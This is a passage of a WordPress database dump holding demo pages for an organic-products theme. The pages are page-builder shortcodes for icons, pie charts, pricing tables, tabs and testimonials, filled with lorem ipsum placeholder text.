nihil expetendis in mei.[/qodef_highlight] Mei an pericula euripidis, hinc partem ei est. Eos ei nisl graecis, vixlorem aperiri consequat an. Eius lorem tincidunt vix at, vel pertinax sensibus id, error epicurei mea et. Me facilisis urbanitas moderatius id. Vis ei rationibus definiebas, eu qui purto zril laoreet. Ex error omnium interpretaris pro, alia illum ea vim pericula.[/vc_column_text][/vc_column][/vc_row]','Highlights','','publish','closed','closed','','highlights','','','2018-02-12 10:59:01','2018-02-12 10:59:01','',1336,'http://succulents.select-themes.com/?page_id=2630',0,'page','',0),(2635,1,'2018-02-12 11:21:57','2018-02-12 11:21:57','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521028428063{padding-top: 100px !important;padding-bottom: 55px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"3186\" title=\"35%\" text=\"food chain\" title_color=\"#3c3c3c\" text_color=\"#3c3c3c\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"3187\" title=\"51%\" text=\"saved animals\" title_color=\"#3c3c3c\" text_color=\"#3c3c3c\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"3188\" title=\"67%\" text=\"recycling\" title_color=\"#3c3c3c\" text_color=\"#3c3c3c\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"3189\" title=\"91%\" text=\"production\" title_color=\"#3c3c3c\" text_color=\"#3c3c3c\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521028444998{padding-top: 100px !important;padding-bottom: 55px !important;}\" simple_background_color=\"#f6f6f6\" parallax_background_image=\"369\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"409\" title=\"35%\" text=\"food chain\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"429\" title=\"51%\" text=\"saved animals\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"431\" title=\"67%\" text=\"recycling\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_icon_with_text type=\"icon-top\" icon_pack=\"font_awesome\" fa_icon=\"\" title_tag=\"h1\" text_tag=\"h3\" custom_icon=\"432\" title=\"91%\" text=\"production\" title_color=\"#ffffff\" text_color=\"#ffffff\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Icon With Text','','publish','closed','closed','','icon-with-text','','','2018-02-12 11:21:57','2018-02-12 11:21:57','',1336,'http://succulents.select-themes.com/?page_id=2635',0,'page','',0),(2644,1,'2018-02-12 11:27:34','2018-02-12 11:27:34','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521032549202{padding-top: 100px !important;padding-bottom: 60px !important;}\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"78\" title=\"Vegan\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"66\" title=\"Organic\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"51\" title=\"Diet\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"43\" title=\"Smoothie\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521032563137{padding-top: 100px !important;padding-bottom: 60px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"78\" title=\"Vegan\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"66\" title=\"Organic\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"51\" title=\"Diet\"][vc_empty_space height=\"40px\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-offset-0 vc_col-lg-3 vc_col-md-offset-0 vc_col-md-6 vc_col-sm-offset-0 vc_col-xs-12\"][qodef_pie_chart title_tag=\"h3\" percent=\"43\" title=\"Smoothie\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Pie Chart','','publish','closed','closed','','pie-chart','','','2018-02-12 11:27:34','2018-02-12 11:27:34','',1336,'http://succulents.select-themes.com/?page_id=2644',0,'page','',0),(2651,1,'2018-02-12 11:44:53','2018-02-12 11:44:53','[vc_row simple_background_color=\"#ffffff\" css=\".vc_custom_1521031348557{padding-top: 100px !important;padding-bottom: 95px !important;}\"][vc_column][qodef_image_gallery type=\"carousel\" enable_image_shadow=\"no\" space_between_items=\"large\" number_of_visible_items=\"4\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_auto_width=\"yes\" enable-center=\"no\" slider_navigation=\"no\" slider_pagination=\"yes\" slider_pagination_skin=\"\" image_size=\"full\" images=\"394,395,396,397,398\"][/vc_column][/vc_row]','Image Gallery','','publish','closed','closed','','image-gallery','','','2018-02-12 11:44:53','2018-02-12 11:44:53','',1336,'http://succulents.select-themes.com/?page_id=2651',0,'page','',0),(2659,1,'2018-02-12 11:54:54','2018-02-12 11:54:54','[vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1521032660602{padding-top: 100px !important;padding-bottom: 70px !important;}\"][vc_column][qodef_pricing_table columns=\"qodef-three-columns\" space_between_items=\"normal\"][qodef_pricing_table_item title=\"Premium\" button_text=\"view more\" button_type=\"solid\" price=\"59\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Standard\" button_text=\"view more\" button_type=\"solid\" price=\"79\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Platinum\" button_text=\"view more\" button_type=\"solid\" price=\"99\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][/qodef_pricing_table][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1521032673502{padding-top: 100px !important;padding-bottom: 70px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][qodef_pricing_table columns=\"qodef-three-columns\" space_between_items=\"normal\"][qodef_pricing_table_item title=\"Premium\" button_text=\"view more\" button_type=\"solid\" price=\"59\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Standard\" button_text=\"view more\" button_type=\"solid\" price=\"79\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Platinum\" button_text=\"view more\" button_type=\"solid\" price=\"99\" currency=\"$\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][/qodef_pricing_table][/vc_column][/vc_row]','Pricing Tables','','publish','closed','closed','','pricing-tables','','','2018-02-12 11:54:54','2018-02-12 11:54:54','',1336,'http://succulents.select-themes.com/?page_id=2659',0,'page','',0),(2667,1,'2018-02-12 12:52:17','2018-02-12 12:52:17','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521032783760{padding-top: 59px !important;padding-bottom: 99px !important;}\"][vc_column][qodef_progress_bar title_tag=\"\" percent=\"89\" title=\"Organic \"][qodef_progress_bar title_tag=\"\" percent=\"74\" title=\"Vegan\"][qodef_progress_bar title_tag=\"\" percent=\"61\" title=\"Smoothie\"][qodef_progress_bar title_tag=\"\" percent=\"43\" title=\"Diet\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521032795656{padding-top: 59px !important;padding-bottom: 99px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][qodef_progress_bar title_tag=\"\" percent=\"89\" title=\"Organic \" color_inactive=\"#ffffff\"][qodef_progress_bar title_tag=\"\" percent=\"74\" title=\"Vegan\" color_inactive=\"#ffffff\"][qodef_progress_bar title_tag=\"\" percent=\"61\" title=\"Smoothie\" color_inactive=\"#ffffff\"][qodef_progress_bar title_tag=\"\" percent=\"43\" title=\"Diet\" color_inactive=\"#ffffff\"][/vc_column][/vc_row]','Progress Bars','','publish','closed','closed','','progress-bars','','','2018-02-12 12:52:17','2018-02-12 12:52:17','',1336,'http://succulents.select-themes.com/?page_id=2667',0,'page','',0),(2676,1,'2018-02-12 13:00:34','2018-02-12 13:00:34','[vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1521028100240{padding-top: 80px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris. Exerci tation suscipit lobortis.[/vc_column_text][vc_empty_space height=\"13px\"][qodef_separator type=\"full-width\" border_style=\"\" color=\"#999999\" thickness=\"1\"][vc_empty_space height=\"30px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris. Exerci tation suscipit lobortis.[/vc_column_text][vc_empty_space height=\"13px\"][qodef_separator type=\"full-width\" border_style=\"\" color=\"#999999\" thickness=\"2\"][vc_empty_space height=\"30px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris. Exerci tation suscipit lobortis.[/vc_column_text][vc_empty_space height=\"13px\"][qodef_separator type=\"full-width\" border_style=\"solid\" color=\"#999999\" thickness=\"3\"][vc_empty_space height=\"30px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris. Exerci tation suscipit lobortis.[/vc_column_text][vc_empty_space height=\"13px\"][qodef_separator type=\"full-width\" border_style=\"dashed\" color=\"#999999\" thickness=\"1\"][vc_empty_space height=\"30px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris. Exerci tation suscipit lobortis.[/vc_column_text][vc_empty_space height=\"13px\"][qodef_separator type=\"full-width\" border_style=\"dotted\" color=\"#999999\" thickness=\"1\"][vc_empty_space height=\"40px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_width=\"grid\" animate_rounded_tab=\"yes\" css=\".vc_custom_1521028135335{padding-top: 45px !important;padding-bottom: 97px !important;}\"][vc_column][vc_text_separator title=\"Separator With Text\" color=\"custom\" el_width=\"50\" accent_color=\"#e0e0e0\"][vc_empty_space height=\"30px\"][vc_text_separator title=\"Separator With Text\" color=\"custom\" style=\"shadow\" el_width=\"70\" accent_color=\"#262626\"][vc_empty_space height=\"30px\"][vc_text_separator title=\"Separator With Text\" color=\"custom\" accent_color=\"#e0e0e0\"][/vc_column][/vc_row]','Separators','','publish','closed','closed','','separators','','','2018-02-12 13:00:34','2018-02-12 13:00:34','',1336,'http://succulents.select-themes.com/?page_id=2676',0,'page','',0),(2689,1,'2018-02-12 14:39:01','2018-02-12 14:39:01','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521028210502{padding-top: 100px !important;padding-bottom: 43px !important;}\"][vc_column][qodef_tabs type=\"vertical\"][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Who we do\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"2002\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Make Better Descisions\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"We’re already there\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"4112\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"The company you keep\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"3113\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Your financial bridge\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"3114\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Quality in everything we do\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"3115\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Turning banking on its head\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.\" tab_content_title=\"Organic Soaps\" tab_image=\"3116\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive Attitude!\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][/qodef_tabs][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521028305161{padding-bottom: 106px !important;}\"][vc_column width=\"1/2\"][qodef_tabs type=\"standard\"][qodef_tabs_item tab_title=\"Design\"][vc_column_text]Lorem e habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Studio\"][vc_column_text]Typi non habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Develop\"][vc_column_text]Du habent usom claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Web\"][vc_column_text]Clarito habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][/qodef_tabs][/vc_column][vc_column width=\"1/2\"][qodef_tabs type=\"standard\"][qodef_tabs_item tab_title=\"Design\"][vc_column_text]Lorem e habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Studio\"][vc_column_text]Typi non habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Develop\"][vc_column_text]Du habent usom claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][qodef_tabs_item tab_title=\"Web\"][vc_column_text]Clarito habent claritatem insitam; est usus legentis in iis qui facit eorum claritatem. Investigationes demonstraverunt lectores legere me lius quod ii legunt saepius. Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam[/vc_column_text][/qodef_tabs_item][/qodef_tabs][/vc_column][/vc_row]','Tabs','','publish','closed','closed','','tabs','','','2018-02-12 14:39:01','2018-02-12 14:39:01','',1336,'http://succulents.select-themes.com/?page_id=2689',0,'page','',0),(2700,1,'2018-02-12 15:09:37','2018-02-12 15:09:37','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521031444492{padding-top: 100px !important;padding-bottom: 63px !important;}\"][vc_column][qodef_team_list number_of_columns=\"4\" space_between_items=\"normal\" number_of_items=\"4\" orderby=\"date\" order=\"ASC\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1521031454830{padding-top: 100px !important;padding-bottom: 63px !important;}\" simple_background_color=\"#f6f6f6\"][vc_column][qodef_team_list number_of_columns=\"4\" space_between_items=\"normal\" number_of_items=\"4\" orderby=\"date\" order=\"DESC\"][/vc_column][/vc_row]','Team','','publish','closed','closed','','team','','','2018-02-12 15:09:37','2018-02-12 15:09:37','',1336,'http://succulents.select-themes.com/?page_id=2700',0,'page','',0),(2705,1,'2018-02-12 15:13:35','2018-02-12 15:13:35','[vc_row row_content_width=\"grid\" css=\".vc_custom_1521031761743{padding-top: 15px !important;padding-bottom: 95px !important;}\"][vc_column][qodef_testimonials skin=\"\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\" number=\"3\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"2285\" css=\".vc_custom_1521031775260{padding-top: 15px !important;padding-bottom: 95px !important;}\"][vc_column][qodef_testimonials skin=\"light\" show_title=\"no\" show_image=\"no\" show_icon=\"yes\" slider_loop=\"yes\" slider_autoplay=\"yes\" slider_navigation=\"no\" slider_pagination=\"yes\" number=\"3\"][/vc_column][/vc_row]','Testimonials','','publish','closed','closed','','testimonials','','','2018-02-12 15:13:35','2018-02-12 15:13:35','',1336,'http://succulents.select-themes.com/?page_id=2705',0,'page','',0),(2716,1,'2018-02-12 15:32:14','2018-02-12 15:32:14','[vc_row row_content_width=\"grid\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" 